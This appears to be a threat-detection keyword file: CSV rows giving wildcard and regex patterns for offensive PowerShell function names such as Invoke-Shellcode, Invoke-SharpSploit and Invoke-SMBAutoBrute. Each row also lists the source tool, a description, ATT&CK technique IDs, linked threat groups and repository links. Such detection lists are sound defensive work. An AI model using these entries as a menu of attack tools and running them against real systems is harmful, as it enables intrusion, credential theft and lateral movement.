"*Invoke-SharpSniper*",".{0,1000}Invoke\-SharpSniper.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49613"
"*Invoke-SharpSploit*",".{0,1000}Invoke\-SharpSploit.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49614"
"*Invoke-Sharpsploit_nomimi*",".{0,1000}Invoke\-Sharpsploit_nomimi.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49615"
"*Invoke-SharpSSDP*",".{0,1000}Invoke\-SharpSSDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49616"
"*Invoke-SharpStay*",".{0,1000}Invoke\-SharpStay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49617"
"*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49618"
"*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49619"
"*Invoke-Sharpview*",".{0,1000}Invoke\-Sharpview.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49620"
"*Invoke-SharpWatson*",".{0,1000}Invoke\-SharpWatson.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49621"
"*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49622"
"*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49623"
"*Invoke-SharpWeb.ps1*",".{0,1000}Invoke\-SharpWeb\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49624"
"*Invoke-SharpWSUS*",".{0,1000}Invoke\-SharpWSUS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49625"
"*Invoke-Shellcode -Payload *",".{0,1000}Invoke\-Shellcode\s\-Payload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49626"
"*Invoke-Shellcode -ProcessId ",".{0,1000}Invoke\-Shellcode\s\-ProcessId\s","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","49627"
"*Invoke-Shellcode -ProcessId *",".{0,1000}Invoke\-Shellcode\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49628"
"*Invoke-Shellcode -Shellcode *",".{0,1000}Invoke\-Shellcode\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49629"
"*Invoke-Shellcode -Shellcode*",".{0,1000}Invoke\-Shellcode\s\-Shellcode.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49630"
"*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49631"
"*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","49632"
"*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49633"
"*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49634"
"*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49635"
"*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49636"
"*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49637"
"*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","49638"
"*Invoke--Shellcode.ps1*",".{0,1000}Invoke\-\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","49639"
"*Invoke-ShellcodeMSIL*",".{0,1000}Invoke\-ShellcodeMSIL.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49640"
"*Invoke-ShellcodeMSIL.ps1*",".{0,1000}Invoke\-ShellcodeMSIL\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49641"
"*Invoke-ShellCommand*",".{0,1000}Invoke\-ShellCommand.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49642"
"*Invoke-SigmaPotato *",".{0,1000}Invoke\-SigmaPotato\s.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","49643"
"*Invoke-SigmaPotato.ps1*",".{0,1000}Invoke\-SigmaPotato\.ps1.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","49644"
"*Invoke-SlinkyCat*",".{0,1000}Invoke\-SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","49645"
"*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49646"
"*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49647"
"*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49648"
"*Invoke-SMBAutoBrute.ps1*",".{0,1000}Invoke\-SMBAutoBrute\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49649"
"*invoke-smbclient *",".{0,1000}invoke\-smbclient\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49650"
